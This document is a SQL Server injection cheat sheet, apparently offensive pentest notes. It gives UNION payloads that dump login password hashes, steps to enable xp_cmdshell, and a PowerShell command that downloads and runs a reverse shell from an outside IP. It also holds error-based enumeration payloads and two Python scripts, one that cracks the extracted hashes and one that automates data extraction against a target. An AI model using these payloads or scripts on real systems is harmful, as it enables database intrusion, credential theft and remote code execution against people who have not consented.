Hashes SQLi

' UNION SELECT name,NULL FROM master..sysdatabases--
' UNION SELECT name, password_hash FROM master.sys.sql_logins--
##Sometimes casting is needed: password_hash is varbinary, so UNIONing it into a text column can error or show raw bytes. Wrap it in fn_varbintohexstr to get the 0x0100/0x0200 hex string hashcat expects (reading the hashes needs sysadmin/CONTROL SERVER rights, otherwise the column comes back NULL)
' UNION SELECT name, master.dbo.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins--
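Added example (not part of these notes): a small Python checker for the hashes the queries above return. It parses the 0x0100/0x0200 hex string that fn_varbintohexstr prints, recomputes SHA-1 or SHA-512 over UTF-16LE(password) || salt the way SQL Server does, and tests candidates offline; it also maps the header to the hashcat mode (132 for 0x0100, 1731 for 0x0200). The sample hash, salt and wordlist are constructed inside the script.

```python
import hashlib
import re

# Formats returned by fn_varbintohexstr(password_hash):
#   0x0100 + 4-byte salt + SHA-1(UTF-16LE(pw) || salt)    SQL Server 2005-2008 R2
#   0x0200 + 4-byte salt + SHA-512(UTF-16LE(pw) || salt)  SQL Server 2012+
HEADER_DIGEST = {0x0100: hashlib.sha1, 0x0200: hashlib.sha512}
HEADER_HEXLEN = {0x0100: 40, 0x0200: 128}
HASHCAT_MODE = {0x0100: 132, 0x0200: 1731}


def mssql_hash(password, salt, version=0x0200):
    """Compute a SQL Server login hash as the server does. Used here both to
    build test data and to verify candidates against an extracted hash."""
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    if version not in HEADER_DIGEST:
        raise ValueError("unsupported header 0x%04x" % version)
    digest = HEADER_DIGEST[version](password.encode("utf-16-le") + salt).hexdigest()
    return "0x%04x%s%s" % (version, salt.hex(), digest)


def parse_mssql_hash(h):
    """Split an extracted hash into (version, salt, digest_hex); rejects
    anything that is not a well-formed 0x0100/0x0200 value."""
    m = re.fullmatch(r"0x(0100|0200)([0-9a-f]{8})([0-9a-f]+)", h.strip().lower())
    if not m:
        raise ValueError("not a SQL Server login hash: %r" % h)
    version = int(m.group(1), 16)
    if len(m.group(3)) != HEADER_HEXLEN[version]:
        raise ValueError("digest length does not match header 0x%04x" % version)
    return version, bytes.fromhex(m.group(2)), m.group(3)


def check_password(h, candidate):
    """True if candidate is the password behind the extracted hash."""
    version, salt, _ = parse_mssql_hash(h)
    return mssql_hash(candidate, salt, version) == h.strip().lower()


def hashcat_mode(h):
    return HASHCAT_MODE[parse_mssql_hash(h)[0]]


def crack(h, wordlist):
    """Offline dictionary attack; returns the password or None."""
    for w in wordlist:
        if check_password(h, w):
            return w
    return None


# Constructed sample: the hash an injection would return for a login whose
# password we set ourselves (salt chosen arbitrarily, not a real extraction).
SAMPLE_SALT = bytes.fromhex("deadbeef")
SAMPLE_HASH = mssql_hash("Winter2024!", SAMPLE_SALT)
SAMPLE_WORDLIST = ["password", "Password1", "Winter2024!", "sa"]

if __name__ == "__main__":
    print("hashcat -m %d" % hashcat_mode(SAMPLE_HASH))
    print("recovered:", crack(SAMPLE_HASH, SAMPLE_WORDLIST))
```

For anything beyond a handful of candidates hand the string straight to hashcat with the mode the script prints; the checker is for confirming a single guess or validating that what you extracted is a complete, well-formed hash before spending cracking time on it.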

RCE SQLi

Enable xp_cmdshell if the login is 'sa' or any other member of the sysadmin role (IS_SRVROLEMEMBER('sysadmin') returns 1); sp_configure/RECONFIGURE need those rights

';EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--
';EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

Execute commands (mind the quote escaping: a single quote inside the T-SQL string must be doubled, so the PowerShell command uses double quotes and escapes its inner quotes with \")

';EXEC master.dbo.xp_cmdshell 'powershell "IEX(New-Object Net.WebClient).downloadString(\"http://192.168.119.122/Utilities/Revshells/shell.ps1\")"';--

Error Based

https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/

##CONVERT(INT, <string>) on a non-numeric value raises Msg 245 "Conversion failed when converting the nvarchar value 'X' to data type int", so whatever the subquery returns is leaked inside the error. Only works while the app shows DB errors

',convert(int,db_name())--

Enumerate databases

 

Enumerate tables of the db (archive here)

',CONVERT(INT,(SELECT top 1 TABLE_NAME FROM archive.information_schema.TABLES)))--
##Note one more closing ) than in the db_name() payload: match the count to the parentheses your input lands inside, or you get a syntax error instead of the conversion error

Enumerate first column from table

',CONVERT(INT,(SELECT top 1 column_name FROM archive.information_schema.COLUMNS WHERE TABLE_NAME='vulnerable')))--

Retrieved id; exclude it with NOT IN and repeat to pull the remaining columns one per request

',CONVERT(INT,(SELECT top 1 column_name FROM archive.information_schema.COLUMNS WHERE TABLE_NAME='vulnerable' AND column_name NOT IN ('id'))))--
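Added example (not part of these notes) that automates the error-based loop above and generalises it: the same CONVERT(INT,(SELECT top 1 ... NOT IN (...))) payload is built for databases (name from master..sysdatabases), tables and columns, the Msg 245 text is parsed out of the response, and the recovered value is appended to the NOT IN list until the subquery returns NULL and the page stops erroring. The target is a constructed stand-in (fake_target with a made-up FAKE_DB) that answers only this query shape in the real error wording; on an engagement replace it with a function that sends the payload over HTTP and returns the body. The archive database and vulnerable table names are the ones used on this page.

```python
import re

# Msg 245 wording; SQL Server quotes the offending string.
MSG245 = re.compile(r"Conversion failed when converting the n?varchar value '(.*?)' to data type int")


def sql_str(s):
    """Quote a T-SQL string literal: a single quote inside it is doubled."""
    return "'" + s.replace("'", "''") + "'"


def leak_payload(column, source, seen, where=None):
    """Build the cheat-sheet payload with a NOT IN list of everything already
    recovered, so each request leaks the next row. The leading ', and the
    trailing ))) match the injection point used on this page; adjust to yours."""
    conds = []
    if where:
        conds.append(where)
    if seen:
        conds.append("%s NOT IN (%s)" % (column, ",".join(sql_str(s) for s in seen)))
    sql = "SELECT top 1 %s FROM %s" % (column, source)
    if conds:
        sql += " WHERE " + " AND ".join(conds)
    return "',CONVERT(INT,(%s)))--" % sql


def leaked_value(body):
    """Pull the leaked string out of a response, or None if no Msg 245."""
    m = MSG245.search(body)
    return m.group(1) if m else None


def enumerate_values(send, column, source, where=None, limit=100):
    """Drive the loop: send, parse the error, grow the NOT IN list, repeat until
    the subquery returns NULL (normal page) or a value repeats."""
    seen = []
    while len(seen) < limit:
        v = leaked_value(send(leak_payload(column, source, seen, where)))
        if v is None or v in seen:
            break
        seen.append(v)
    return seen


# ---- constructed stand-in for the vulnerable page (not a real server) ----
FAKE_DB = {
    "master..sysdatabases": [{"name": n} for n in ("master", "tempdb", "archive")],
    "archive.information_schema.TABLES": [{"TABLE_NAME": "vulnerable"}, {"TABLE_NAME": "users"}],
    "archive.information_schema.COLUMNS": [
        {"TABLE_NAME": "vulnerable", "column_name": c} for c in ("id", "username", "password")
    ] + [{"TABLE_NAME": "users", "column_name": "email"}],
}


def fake_target(payload):
    """Answers only the query shape leak_payload builds. A matching row yields
    the real Msg 245 text; no row (NULL) yields a normal page, as on a real box."""
    m = re.search(r"SELECT top 1 (\w+) FROM ([\w.]+)", payload)
    if not m:
        return "<html>ok</html>"
    col, source = m.groups()
    rows = FAKE_DB.get(source, [])
    t = re.search(r"TABLE_NAME='([^']*)'", payload)
    if t:
        rows = [r for r in rows if r.get("TABLE_NAME") == t.group(1)]
    n = re.search(r"NOT IN \(([^)]*)\)", payload)
    excluded = [x.strip("'") for x in n.group(1).split(",")] if n else []
    for r in rows:
        if r[col] not in excluded:
            return ("Microsoft OLE DB Provider for SQL Server error '80040e07' "
                    "Conversion failed when converting the nvarchar value '%s' "
                    "to data type int." % r[col])
    return "<html>ok</html>"


if __name__ == "__main__":
    print(enumerate_values(fake_target, "name", "master..sysdatabases"))
    print(enumerate_values(fake_target, "TABLE_NAME", "archive.information_schema.TABLES"))
    print(enumerate_values(fake_target, "column_name", "archive.information_schema.COLUMNS",
                           where="TABLE_NAME=" + sql_str("vulnerable")))
```

The limit argument is the safety stop: on a real target a table with thousands of rows, or a WAF that rewrites the error page, will otherwise keep the loop running. The NOT IN list also grows with every request, so for long lists switch to a row-number or "> last value" predicate instead of sending the whole history each time.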